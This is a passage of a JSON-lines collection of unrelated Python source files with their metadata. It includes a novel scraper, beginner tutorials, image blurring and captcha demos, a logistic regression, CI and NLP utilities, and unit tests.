Gecko) Chrome/114.0.0.0 Safari/537.36\",\n )\n context.set_default_timeout(300000.00)\n\n print(\"开始获取小说目录列表\")\n content = await get_page_content(context, catalogue_url)\n url_list, novel_title = get_catalogue_url_list(catalogue_url, content, catalogue_selector)\n\n remove_title(novel_title + web_name)\n\n loop_num = 100\n for i in range(len(url_list[start_num:]) // loop_num + 1):\n async with asyncio.TaskGroup() as tg:\n tasks_list = [\n tg.create_task(get_page_content(context, novel_url))\n for novel_url in url_list[start_num + i * loop_num: start_num + (i + 1) * loop_num]\n ]\n print(\"开始爬取小说内容\")\n\n print(f\"爬取成功 {loop_num} 章, 正在写入文件\")\n for task in tasks_list:\n get_novel_content(task.result(), novel_title, novel_selector)\n await asyncio.sleep(5.0)\n\n await browser.close()\n await p.stop()\n print(\"无头浏览器已关闭\")\n\n\nif __name__ == \"__main__\":\n catalogue_url = input(\"请输入小说目录的url:\") or \"https://www.biququ.info/html/61746/\"\n start_num = input(\"从第几章开始爬取(直接回车默认从头开始):\")\n if start_num.isdigit():\n start_num = int(start_num)\n else:\n start_num = 0\n web_name = \"_\" + parse.urlparse(catalogue_url).netloc.split(\".\")[-2]\n catalogue_selector = input(\"catalogue_selector:(直接回车默认为div#list dd)\") or \"div#list dd\"\n novel_selector = input(\"novel_selector:(直接回车默认为div#content)\") or \"div#content\"\n asyncio.run(main(catalogue_url, start_num, catalogue_selector, novel_selector))\n input(\"\\n\\n爬取成功结束, 回车退出\")\n","repo_name":"boxie123/NovelCrawl","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16943802864","text":"''' metody klas, jak definiować metody klas\r\nsą to funkcje które można wywoływać z poziomu klasy. mogą dotyczyć samej klasy lub poszczególnych instancji '''\r\n\r\nclass Zwierz:\r\n # poniżej definicja klasy\r\n # opis klasy\r\n '''pierwsza klasa'''\r\n # definiujemy metodę klasy czyli funkcję wewnątrz klasy\r\n #rodzaj # definiujemy atrybuty ktorych warotci beda wspolne dla wszytskich obiektow klas\r\n rodzaj = \"zwierzę\" # w tym celu wpisujemy nazwę atrybutu wewnątrz defnicji klasy pomijając \"self\"\r\n zwierzeta = {}\t\t\t\t\t#nowa zmienna - słownik którego kluczem będą nazwy zwierząt a wartością liczebność\r\n\r\n def __init__(self, gatunek, wiek, predkosc): #po self podajemy argumenty ktore będziemy podawawac przy tworzeniu instancji klas\r\n self.gatunek = gatunek #podczas inicjalizacji klasy stawiamy atrybuty\r\n self.wiek = wiek\r\n self.max_predkosc = predkosc\t\t\t#kolejny atrybut potrzebny w metodzie\r\n if gatunek in Zwierz.zwierzeta:\t\t\t#jeśli gatunek znajduje się w słowniku zwierzęta\r\n Zwierz.zwierzeta[gatunek]+= 1\t\t# to dodajmy 1 do wartości wskazywanej przez ten gatunek zwiększając liczebność zwierząt w naszym zoo\r\n else:\t\t\t\t\t\t\t\t\t# w przeciwnym razie tworzymy nowy wpis w słowniku dodając taki gatunek i ustaw liczebność na 1\r\n Zwierz.zwierzeta[gatunek] = 1\r\n def oblicz_odleglosc(self, czas):\t\t\t#metody dostępne (wywoływane) z poziomu instancji powinny posiadać argument self\r\n print(czas * self.max_predkosc)\r\n def wypisz_zwierzeta():\t\t\t\t#kolejna metoda klasy (bez self) wypisująca ilość\r\n print(Zwierz.zwierzeta)\r\n# metoda specjalna klasy wywoływane prez python'a w chwili wywoływania funkcji wbudowanych np. print\r\n def __str__(self):\r\n return self.gatunek\\\r\n\t\t\t + \" ma \" + str(self.wiek)\\\r\n\t\t\t + \" lat/a i osiąga prędkość \"\\\r\n\t\t\t + str(self.max_predkosc) + \" km/h\"\r\n#w powyższym str - wiek i str max.predkosc bo są intiger'ami\r\n\r\nZwierz.wypisz_zwierzeta()\t\t#sprawdzenie zawartości słownika przed deklaracją obiektów {}\r\na = Zwierz(\"lis\", 5, 10)\r\nb = Zwierz(\"pyton\", 2, 5)\r\nc = Zwierz(\"lis\", 3, 10)\r\nZwierz.wypisz_zwierzeta()\t\t# {'lis': 2, 'pyton': 1} mamy 2 obiekty gatunku lis - sprawdzenie po deklaracji\r\na.oblicz_odleglosc(2)\r\nb.oblicz_odleglosc(2)\r\n\r\n#możemy definiować metody na poziomie klas - dot. zwierzeta\r\na = Zwierz(\"lis\", 3 , 10)\t\t#definiujemy instancję klasy\r\nprint(a)\t\t\t\t\t#bez def __str__ __main__.Zwierz object at 0x0000021ED8DD6278> - łańcuch mówiący o typie obiektu\r\n\t\t\t\t\t\t\t# a def __str__ lis ma 3 lat/a i osiąga prędkość 10 km/h","repo_name":"wojtekkrupa/REP","sub_path":"Kurs1_podstawy/metody klas.py","file_name":"metody klas.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27627608617","text":"#!/usr/bin/python3\n\nfrom pyrob.api import *\n\n\n@task(delay=0.05)\ndef task_4_11():\n row_number = 13\n column_pairs = 7\n for num, column in enumerate(range(column_pairs)):\n move_right()\n for row in range(row_number):\n move_down()\n fill_cell()\n if num < len(range(column_pairs)) - 1:\n row_number -= 2\n move_right()\n fill_cell()\n for row in range(row_number):\n move_up()\n fill_cell()\n move_down()\n move_left(12)\n\n\nif __name__ == '__main__':\n run_tasks()\n","repo_name":"AndreyAD1/mipt_course","sub_path":"lesson2/robot-tasks-master/task_21.py","file_name":"task_21.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26372521909","text":"# gestion d'erreur\n\n# nb = input('nb premier')\n\n# try:\n# nb = int(nb)\n# except:\n# print('l âge n est pas bon')\n# else:\n# print(f\"le nombre est {nb}\")\n# finally:\n# print('Fin du programme')\n\n\nnb1 = 150\nnb2 = input('nb à diviser')\n\ntry:\n nb2 = int(nb2)\n print(f'Résultat = {nb1 / nb2}')\nexcept ZeroDivisionError:\n print(\"Vous ne pouvez pas divisier par 0\")\n\nexcept ValueError:\n print(\"vous devez entrer un nombre.\")\n\nexcept:\n print(\"valeur incorrecte\")\n\nelse:\n print(\"Bravo, tu as noté un nombre valide\")\nfinally:\n print(\"Fin du programme\")\n\n\n\n#creation de notre propre error avec raise\n\n\n\n#assert error\n\n","repo_name":"Misteur54/ifa-python","sub_path":"Jour3/ex00/demo_ifa_err.py","file_name":"demo_ifa_err.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4111822408","text":"from os import getcwd\n\nfrom typer import Argument, Option, Exit\nfrom typing_extensions import Annotated\n\nfrom rich import print as rprint\n\nfrom download import download_playlist, download_video\n\n__app_name__ = 'YouTube to MP3 CLI'\n__version__ = '0.0.1'\n\n\ndef _version_callback(value: bool):\n if value:\n rprint(f'{__app_name__} [bold green]v{__version__}[/bold green]')\n raise Exit()\n\n\ndef main(\n url: Annotated[str, Argument(help='YouTube video or playlist URL', show_default=False)],\n output: Annotated[str, Argument(help='Output directory')] = f'{getcwd()}\\\\output',\n playlist: Annotated[bool, Option('--playlist', '-p', help='Download playlist')] = False,\n version: Annotated[bool, Option('--version', '-v', help='Show version', callback=_version_callback)] = False,\n) -> None:\n \"\"\"\n Convert a YouTube video or playlist to mp3 and download it.\n \"\"\"\n download_playlist(url, output) if playlist else download_video(url, output)\n","repo_name":"DevTotoro/youtube-to-mp3-cli","sub_path":"src/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13299560449","text":"from PIL import Image\n# open a jpg image file cd\nim = Image.open('test.jpg')\n# collect image size\nw, h = im.size\nprint('Original image size: %s %s ' % (w, h))\n# 缩放到50%\nim.thumbnail((w//2, h//2))\nprint('Resize image to: %s %s' % (w//2, h//2))\n# 将缩放后の图像有个jpeg保存起来\nim.save('thumbnail.jpg', 'jpeg')\n\nfrom PIL import ImageFilter # 滤波 滤光\n# 将之模糊化\nim2 = im.filter(ImageFilter.BLUR)\nim2.save('bulr.jpg', 'jpeg')\n\n# 生成字母验证码图片\n\nfrom PIL import ImageDraw, ImageFont, ImageFilter # 绘图 # 绘字 # 滤光\nimport random\n# 随机字母\n\n\ndef rndChar():\n return chr(random.randint(65, 90)) # 字母对应ascII码\n# 随机颜色\n\n\ndef rndColor():\n return (random.randint(64, 255), random.randint(64, 255), random.randint(64, 255))\n# 随机颜色2\n\n\ndef rndColor2():\n return (random.randint(32, 127), random.randint(32, 127), random.randint(32, 127))\n# 240X60\nwidth = 60 * 4\nheight = 60\nimage = Image.new('RGB', (width, height), (255, 255, 255))\n# create Font object\nfont = ImageFont.truetype('c:/Windows/Fonts/Arial.ttf', 36)\n# create Draw object\ndraw = ImageDraw.Draw(image)\n# 填充每个像素\nfor x in range(width):\n for y in range(height):\n draw.point((x, y), fill=rndColor())\n# output words\nfor t in range(4):\n letter = rndChar()\n print('%d: %s' % (t+1,letter))\n draw.text((60 * t + 10, 10), letter, font=font, fill=rndColor2())\n# 模糊\nimage = image.filter(ImageFilter.BLUR)\nimage.save('code.jpg', 'jpeg')\n","repo_name":"xiaoyaojjian/py_learn","sub_path":"曾经练习代码/pillow_test.py","file_name":"pillow_test.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72485271847","text":"import cv2 as cv\r\nimg=cv.imread('pictures/balloon.jpg')\r\ncv.imshow('Balloon',img) #kernel size basically no. of rows and columns\r\n#AVERAGE BLUR, we take the middle pixel intensity which is the average of the pixel intensities around it\r\naverage=cv.blur(img,(7,7))#(3,3) is the kernel size\r\ncv.imshow('Average Blur',average)\r\n#GAUSSIAN BLUR, similar to average blurring but we use a weighted mean where neighbourhood pixels closer to\r\n#to the central pixel contribute more weight to the average\r\ngauss=cv.GaussianBlur(img,(7,7),0) #0 is standard deviation towards x\r\ncv.imshow('GAUSSIAN blur',gauss)\r\n#MEDIAN BLUR,similar to average but instead we find the median of the surrounding pixels-better blurring than guass and average\r\nmedian=cv.medianBlur(img,7) #we take only 3 because it is automatically assumed to be a tuple of 3,3 size\r\ncv.imshow('Median',median)\r\n#BILATERAL BLUR,blurring will take place but the edges will be retained\r\nbilateral=cv.bilateralFilter(img,10,35,25) #5 ->Diameter of each pixel neighborhood,15->SigmaColor,colors farther to each other will get mixed\r\n#15-> sigmaSpace,more further pixels will get mixed\r\ncv.imshow('BILATERAL',bilateral)\r\ncv.waitKey(0)","repo_name":"VanshikaThapliyal/OpenCV-BasicOperations","sub_path":"smoothing.py","file_name":"smoothing.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21454515965","text":"# -*- coding: utf-8 -*-\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n Perf: Runtime: 12 ms, faster than 99.50% / Memory Usage: 11.8 MB, less than 67.82%\n T: O(n)\n S: O(n)\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n node = ListNode(None)\n head = node\n while l1 and l2:\n if l1.val < l2.val:\n node.next = l1\n l1 = l1.next\n else:\n node.next = l2\n l2 = l2.next\n node = node.next\n\n while l1:\n node.next = l1\n l1 = l1.next\n node = node.next\n\n while l2:\n node.next = l2\n l2 = l2.next\n node = node.next\n\n return head.next","repo_name":"jerrt2003/leetcode-in-python","sub_path":"Interview_Feedback/Cruise/21. Merge Two Sorted Lists/Scan2.py","file_name":"Scan2.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7421568750","text":"import spacy\r\nimport textacy\r\nimport textacy.resources\r\nfrom nltk.corpus import wordnet as wn\r\nfrom nltk.corpus.reader import WordNetError\r\nfrom nltk.stem import WordNetLemmatizer\r\nimport nltk\r\nfrom textacy import utils as util_aug\r\nfrom textacy.augmentation.transforms import _select_random_candidates\r\nfrom textacy.augmentation.utils import to_aug_toks\r\nfrom textacy.augmentation.utils import AugTok\r\n\r\nwnl = WordNetLemmatizer()\r\n\r\n\r\nclass Definition:\r\n def __init__(self, docs, nlp=None):\r\n self.docs = docs\r\n self.nlp = nlp\r\n nltk.download('wordnet')\r\n nltk.download('omw-1.4')\r\n rs = textacy.resources.ConceptNet()\r\n rs.download()\r\n if not self.nlp:\r\n spacy.cli.download(\"en_core_web_lg\")\r\n self.nlp = spacy.load(\"en_core_web_lg\")\r\n\r\n def mass_definition(self):\r\n return [make_new_text(self.definition_words(doc, [\"NOUN\", \"VERB\", \"ADV\", \"ADJ\"], 0.50))\r\n for doc in self.nlp.pipe(self.docs, batch_size=500)]\r\n\r\n def definition_words(self, doc, pos, num):\r\n aug_toks = to_aug_toks(doc)\r\n pos = util_aug.to_collection(pos, str, set)\r\n cand_idxs = [\r\n idx\r\n for idx, aug_tok in enumerate(aug_toks)\r\n if aug_tok.syns and (pos is None or aug_tok.pos in pos)\r\n ]\r\n rand_idxs = set(_select_random_candidates(cand_idxs, num))\r\n if not rand_idxs:\r\n return aug_toks[:]\r\n\r\n return [AugTok(\r\n text=decide_definition(aug_tok),\r\n ws=aug_tok.ws,\r\n pos=aug_tok.pos,\r\n is_word=aug_tok.is_word,\r\n syns=aug_tok.syns,\r\n )\r\n if idx in rand_idxs\r\n else aug_tok\r\n for idx, aug_tok, in enumerate(aug_toks)\r\n ]\r\n\r\n\r\ndef definition_words(doc, pos, num):\r\n aug_toks = to_aug_toks(doc)\r\n pos = util_aug.to_collection(pos, str, set)\r\n cand_idxs = [\r\n idx\r\n for idx, aug_tok in enumerate(aug_toks)\r\n if aug_tok.syns and (pos is None or aug_tok.pos in pos)\r\n ]\r\n rand_idxs = set(_select_random_candidates(cand_idxs, num))\r\n if not rand_idxs:\r\n return aug_toks[:]\r\n\r\n return [AugTok(\r\n text=decide_definition(aug_tok),\r\n ws=aug_tok.ws,\r\n pos=aug_tok.pos,\r\n is_word=aug_tok.is_word,\r\n syns=aug_tok.syns,\r\n )\r\n if idx in rand_idxs\r\n else aug_tok\r\n for idx, aug_tok, in enumerate(aug_toks)\r\n ]\r\n\r\n\r\ndef make_new_spacy_doc(aug_toks):\r\n new_text = \"\".join(\r\n aug_tok.text + aug_tok.ws\r\n for aug_tok in aug_toks\r\n )\r\n return textacy.spacier.core.make_spacy_doc(new_text, \"en_core_web_lg\")\r\n\r\n\r\ndef make_new_text(aug_toks):\r\n return \"\".join(\r\n aug_tok.text + aug_tok.ws\r\n for aug_tok in aug_toks\r\n )\r\n\r\n\r\ndef decide_definition(aug_tok):\r\n pos_dict = {'NOUN': 'n',\r\n 'VERB': 'v',\r\n 'ADJ': 'a',\r\n 'ADV': 'r'}\r\n try:\r\n return wn.synset(wnl.lemmatize(aug_tok.text, pos=pos_dict.get(aug_tok.pos)) + \".\" + pos_dict.get(\r\n aug_tok.pos) + '.01').definition()\r\n except WordNetError:\r\n return aug_tok.text\r\n\r\n#if __name__ == \"__main__\":\r\n# main()\r\n","repo_name":"BaranPolat/master-thesis","sub_path":"definition.py","file_name":"definition.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19175628662","text":"import lbry.wallet\nfrom lbry.extras.daemon import analytics\n\nimport unittest\n\n\n@unittest.SkipTest\nclass TrackTest(unittest.TestCase):\n def test_empty_summarize_is_none(self):\n track = analytics.Manager(None, 'x', 'y', 'z')\n _, result = track.summarize_and_reset('a')\n self.assertIsNone(result)\n\n def test_can_get_sum_of_metric(self):\n track = analytics.Manager(None, 'x', 'y', 'z')\n track.add_observation('b', 1)\n track.add_observation('b', 2)\n\n _, result = track.summarize_and_reset('b')\n self.assertEqual(3, result)\n\n def test_summarize_resets_metric(self):\n track = analytics.Manager(None, 'x', 'y', 'z')\n track.add_observation('metric', 1)\n track.add_observation('metric', 2)\n\n track.summarize_and_reset('metric')\n _, result = track.summarize_and_reset('metric')\n self.assertIsNone(result)\n","repo_name":"lbryio/lbry-sdk","sub_path":"tests/unit/analytics/test_track.py","file_name":"test_track.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":7218,"dataset":"github-code","pt":"53"} +{"seq_id":"71565533927","text":"import os\r\nfrom config.config import *\r\n\r\n\r\ndef del_file(datapath):\r\n train_path = ['training-a', 'training-b', 'training-c', 'training-d', 'training-e', 'training-f']\r\n val_path = 'validation'\r\n val_data = []\r\n for dataset in os.listdir(datapath):\r\n data_dir = os.path.join(datapath, dataset)\r\n for data in os.listdir(data_dir):\r\n data_path = os.path.join(data_dir, data)\r\n if os.path.isfile(data_path):\r\n if data.startswith(\".\"):\r\n os.remove(data_path)\r\n print(data + 'del done!')\r\n elif not data.endswith(\".wav\"):\r\n if data.endswith(\".csv\"):\r\n continue\r\n os.remove(data_path)\r\n print(data + 'del done!')\r\n\r\n val_data_path = os.path.join(datapath, val_path)\r\n for _data in os.listdir(val_data_path):\r\n if not _data.endswith('.csv'):\r\n val_data.append(_data)\r\n for train_path in train_path:\r\n train_data_path = os.path.join(datapath, train_path)\r\n for train_data in os.listdir(train_data_path):\r\n if train_data in val_data:\r\n # print(train_data)\r\n train_data = os.path.join(train_data_path, train_data)\r\n os.remove(train_data)\r\n print('Del File Done!')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n del_file(DATAPATH)\r\n","repo_name":"Darrenonly/PCG","sub_path":"del_repeat_file.py","file_name":"del_repeat_file.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"29637522816","text":"# Упражнение 10.6\n# Найдите сумму чисел, вводимых с клавиатуры. Количество вводимых чисел заранее\n# неизвестно. Окончание ввода, например, слово «Стоп».\ntotal = 0\nwhile True:\n n = input(\"Ведите число, если достаточно, введите стоп: \")\n if str(n) == 'стоп':\n print(\"Пока-Пока!!!\")\n break\n else:\n total = total + int(n)\n print(total)","repo_name":"vklimov1976/python","sub_path":"Task-10.6.py","file_name":"Task-10.6.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34343610571","text":"import os\n\nfrom transformers import CLIPTokenizer, CLIPTextModel, CLIPTextConfig\nimport torch\n\nclass ClipTokenWeightEncoder:\n def encode_token_weights(self, token_weight_pairs):\n z_empty = self.encode(self.empty_tokens)\n output = []\n for x in token_weight_pairs:\n tokens = [list(map(lambda a: a[0], x))]\n z = self.encode(tokens)\n for i in range(len(z)):\n for j in range(len(z[i])):\n weight = x[j][1]\n z[i][j] = (z[i][j] - z_empty[0][j]) * weight + z_empty[0][j]\n output += [z]\n if (len(output) == 0):\n return self.encode(self.empty_tokens)\n return torch.cat(output, dim=-2)\n\nclass SD1ClipModel(torch.nn.Module, ClipTokenWeightEncoder):\n \"\"\"Uses the CLIP transformer encoder for text (from huggingface)\"\"\"\n LAYERS = [\n \"last\",\n \"pooled\",\n \"hidden\"\n ]\n def __init__(self, version=\"openai/clip-vit-large-patch14\", device=\"cpu\", max_length=77,\n freeze=True, layer=\"last\", layer_idx=None, textmodel_json_config=None, textmodel_path=None): # clip-vit-base-patch32\n super().__init__()\n assert layer in self.LAYERS\n if textmodel_path is not None:\n self.transformer = CLIPTextModel.from_pretrained(textmodel_path)\n else:\n if textmodel_json_config is None:\n textmodel_json_config = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"sd1_clip_config.json\")\n config = CLIPTextConfig.from_json_file(textmodel_json_config)\n self.transformer = CLIPTextModel(config)\n\n self.device = device\n self.max_length = max_length\n if freeze:\n self.freeze()\n self.layer = layer\n self.layer_idx = None\n self.empty_tokens = [[49406] + [49407] * 76]\n if layer == \"hidden\":\n assert layer_idx is not None\n assert abs(layer_idx) <= 12\n self.clip_layer(layer_idx)\n\n def freeze(self):\n self.transformer = self.transformer.eval()\n #self.train = disabled_train\n for param in self.parameters():\n param.requires_grad = False\n\n def clip_layer(self, layer_idx):\n if abs(layer_idx) >= 12:\n self.layer = \"last\"\n else:\n self.layer = \"hidden\"\n self.layer_idx = layer_idx\n\n def forward(self, tokens):\n tokens = torch.LongTensor(tokens).to(self.device)\n outputs = self.transformer(input_ids=tokens, output_hidden_states=self.layer==\"hidden\")\n\n if self.layer == \"last\":\n z = outputs.last_hidden_state\n elif self.layer == \"pooled\":\n z = outputs.pooler_output[:, None, :]\n else:\n z = outputs.hidden_states[self.layer_idx]\n z = self.transformer.text_model.final_layer_norm(z)\n\n return z\n\n def encode(self, tokens):\n return self(tokens)\n\ndef parse_parentheses(string):\n result = []\n current_item = \"\"\n nesting_level = 0\n for char in string:\n if char == \"(\":\n if nesting_level == 0:\n if current_item:\n result.append(current_item)\n current_item = \"(\"\n else:\n current_item = \"(\"\n else:\n current_item += char\n nesting_level += 1\n elif char == \")\":\n nesting_level -= 1\n if nesting_level == 0:\n result.append(current_item + \")\")\n current_item = \"\"\n else:\n current_item += char\n else:\n current_item += char\n if current_item:\n result.append(current_item)\n return result\n\ndef token_weights(string, current_weight):\n a = parse_parentheses(string)\n out = []\n for x in a:\n weight = current_weight\n if len(x) >= 2 and x[-1] == ')' and x[0] == '(':\n x = x[1:-1]\n xx = x.rfind(\":\")\n weight *= 1.1\n if xx > 0:\n try:\n weight = float(x[xx+1:])\n x = x[:xx]\n except:\n pass\n out += token_weights(x, weight)\n else:\n out += [(x, current_weight)]\n return out\n\ndef escape_important(text):\n text = text.replace(\"\\\\)\", \"\\0\\1\")\n text = text.replace(\"\\\\(\", \"\\0\\2\")\n return text\n\ndef unescape_important(text):\n text = text.replace(\"\\0\\1\", \")\")\n text = text.replace(\"\\0\\2\", \"(\")\n return text\n\nclass SD1Tokenizer:\n def __init__(self, tokenizer_path=None, max_length=77, pad_with_end=True):\n if tokenizer_path is None:\n tokenizer_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"sd1_tokenizer\")\n self.tokenizer = CLIPTokenizer.from_pretrained(tokenizer_path)\n self.max_length = max_length\n empty = self.tokenizer('')[\"input_ids\"]\n self.start_token = empty[0]\n self.end_token = empty[1]\n self.pad_with_end = pad_with_end\n vocab = self.tokenizer.get_vocab()\n self.inv_vocab = {v: k for k, v in vocab.items()}\n\n def tokenize_with_weights(self, text):\n text = escape_important(text)\n parsed_weights = token_weights(text, 1.0)\n\n tokens = []\n for t in parsed_weights:\n tt = self.tokenizer(unescape_important(t[0]))[\"input_ids\"][1:-1]\n for x in tt:\n tokens += [(x, t[1])]\n\n out_tokens = []\n for x in range(0, len(tokens), self.max_length - 2):\n o_token = [(self.start_token, 1.0)] + tokens[x:min(self.max_length - 2 + x, len(tokens))]\n o_token += [(self.end_token, 1.0)]\n if self.pad_with_end:\n o_token +=[(self.end_token, 1.0)] * (self.max_length - len(o_token))\n else:\n o_token +=[(0, 1.0)] * (self.max_length - len(o_token))\n\n out_tokens += [o_token]\n\n return out_tokens\n\n def untokenize(self, token_weight_pair):\n return list(map(lambda a: (a, self.inv_vocab[a[0]]), token_weight_pair))\n","repo_name":"samuelchristlie/StellarUI","sub_path":"backend/sd1_clip.py","file_name":"sd1_clip.py","file_ext":"py","file_size_in_byte":6119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27230338699","text":"import numpy as np\n\nfrom zadania import adam\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\nclass LogisticRegressionCost:\n\n def __init__(self, X, y, reg_lambda):\n self.X = X\n self.y = y\n self.reg_lambda = reg_lambda\n\n def taylor(self, x):\n # x == (w, b)\n w = x[:-1]\n b = x[-1]\n y_pred = sigmoid(np.dot(self.X, w) + b) \n dw = (np.dot(self.X.T, (y_pred - self.y)) + self.reg_lambda * w) / len(self.X)\n db = np.average(y_pred - self.y) + self.reg_lambda * b / len(self.X)\n dx = np.concatenate((dw, np.array([db])))\n return (\n 0., # dummy value, won't be needed\n dx)\n\nclass LogisticRegression:\n\n def __init__(self, X, y, reg_lambda=1., n_iter=100, tol=.0001, seed=43):\n w = np.random.RandomState(seed=seed).normal(size=(X.shape[1],))\n b = 0\n x = np.concatenate((w, np.array([b])))\n optimizer = adam(\n f=LogisticRegressionCost(X, y, reg_lambda),\n starting_point=x,\n learning_rate=.1,\n beta1=0.9,\n beta2=0.999,\n epsilon=1e-8)\n MAX_REPEATS = 43\n for _ in range(MAX_REPEATS):\n for _, (x, _, grad) in zip(range(n_iter), optimizer):\n pass\n if np.average(np.abs(grad)) < tol:\n break\n self.w = x[:-1]\n self.b = x[-1]\n \n def predict_proba(self, X):\n y_pred = sigmoid(np.dot(X, self.w) + self.b)\n return np.stack((1 - y_pred, y_pred), axis=1)\n\n def predict(self, X):\n return (self.predict_proba(X)[:,1].reshape(-1,1) >= .5).astype(np.uint8)\n","repo_name":"yaroslavvasko/ml2018","sub_path":"lab/zadania/rozwiazania/zadanie5.py","file_name":"zadanie5.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7163541266","text":"from ._base import DataSource\nfrom .. import const, utils\n\n\nclass AppVeyorSource(DataSource):\n name = \"appveyor\"\n priority = const.PRIORITY_SERVICE\n\n def is_active(self):\n return self.context.get_from_environ(\n \"APPVEYOR\", convert_bools=True\n ) and self.context.get_from_environ(\"CI\", convert_bools=True)\n\n def get_values(self):\n project_owner, project_name = utils.split_project_slug(\n self.context.get_from_environ(\"APPVEYOR_REPO_NAME\")\n )\n build_number = self.context.get_from_environ(\"APPVEYOR_BUILD_NUMBER\")\n job_number = self.context.get_from_environ(\"APPVEYOR_JOB_NUMBER\")\n\n build = {\n const.PROJECT_OWNER: project_owner,\n const.PROJECT_NAME: project_name,\n const.COMMIT: self.context.get_from_environ(\"APPVEYOR_REPO_COMMIT\"),\n const.BRANCH: self.context.get_from_environ(\"APPVEYOR_REPO_BRANCH\"),\n const.TAG: self.context.get_from_environ(\"APPVEYOR_REPO_TAG_NAME\"),\n const.SERVICE: \"appveyor\",\n const.BUILD_ID: \"appveyor-%s.%s\" % (build_number, job_number),\n }\n\n build_id = self.context.get_from_environ(\"APPVEYOR_BUILD_ID\")\n job_id = self.context.get_from_environ(\"APPVEYOR_JOB_ID\")\n\n # AppVeyor does this weird thing where the project owner\n # isn't necessarily the same owner as the CI project\n appveyor_account_name = self.context.get_from_environ(\"APPVEYOR_ACCOUNT_NAME\")\n appveyor_project_name = self.context.get_from_environ(\"APPVEYOR_PROJECT_NAME\")\n if appveyor_account_name and appveyor_project_name and build_id and job_id:\n build[const.URL] = (\n \"https://ci.appveyor.com/project/%s/%s/builds/%s/job/%s\"\n % (appveyor_account_name, appveyor_project_name, build_id, job_id)\n )\n\n appveyor = {\n \"repo\": {\n \"provider\": self.context.pop_from_environ(\"APPVEYOR_REPO_PROVIDER\"),\n \"scm\": self.context.pop_from_environ(\"APPVEYOR_REPO_SCM\"),\n },\n \"platform\": self.context.pop_from_environ(\"PLATFORM\"),\n \"worker_image\": self.context.pop_from_environ(\n \"APPVEYOR_BUILD_WORKER_IMAGE\"\n ),\n }\n\n pull_request_number = self.context.get_from_environ(\n \"APPVEYOR_PULL_REQUEST_NUMBER\",\n normalizer=lambda x: int(x) if x != \"false\" else None,\n )\n if pull_request_number:\n build[const.PULL_REQUEST] = pull_request_number\n\n self.context.pop_from_environ(\n [\"CI\", \"APPVEYOR\", \"CONFIGURATION\", \"PLATFORM\", \"CI_LINUX\", \"CI_WINDOWS\"]\n )\n self.context.pop_from_environ(\n [x for x in self.context.environ if x.startswith(\"APPVEYOR_\")]\n )\n\n return {\"appveyor\": appveyor, \"build\": build}\n","repo_name":"sethmlarson/delt","sub_path":"src/delt/sources/appveyor.py","file_name":"appveyor.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"33353852015","text":"# coding : UTF-8\nimport towhee\nimport unittest\n\n\nclass TestDagInfo(unittest.TestCase):\n \"\"\" Test case of dag info \"\"\"\n def test_image_decode_clip_dag_information(self):\n \"\"\"\n Unittest dag info\n \"\"\"\n dc = towhee.dummy_input() \\\n .image_decode['path', 'img']() \\\n .towhee.clip['img', 'vec'](model_name='clip_vit_b32', modality='image', op_config={'ac':'123', 'asd':'wea'}) \\\n .as_function() \n \n a = dc.dag_info['end']['parent_ids'][0]\n b = {'model_name': 'clip_vit_b32', 'modality': 'image'}\n\n self.assertEqual(dc.dag_info[a]['init_args'] ,b)\n\n for key, val in dc.dag_info.items():\n if val['op'] == 'stream':\n self.assertEqual(val['op_name'], 'dummy_input')\n if val['parent_ids'] == []:\n self.assertEqual(key, 'start')\n\n expect = {'ac':'123', 'asd':'wea'}\n for i in dc.dag_info.values():\n if i['op_name'] == 'towhee/clip':\n self.assertEqual(i['op_config'], expect)\n else:\n self.assertEqual(i['op_config'], None)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"sitedata/towhee","sub_path":"tests/testcases/test_dag_info.py","file_name":"test_dag_info.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"11979106627","text":"from pathlib import Path\n\nimport pandas as 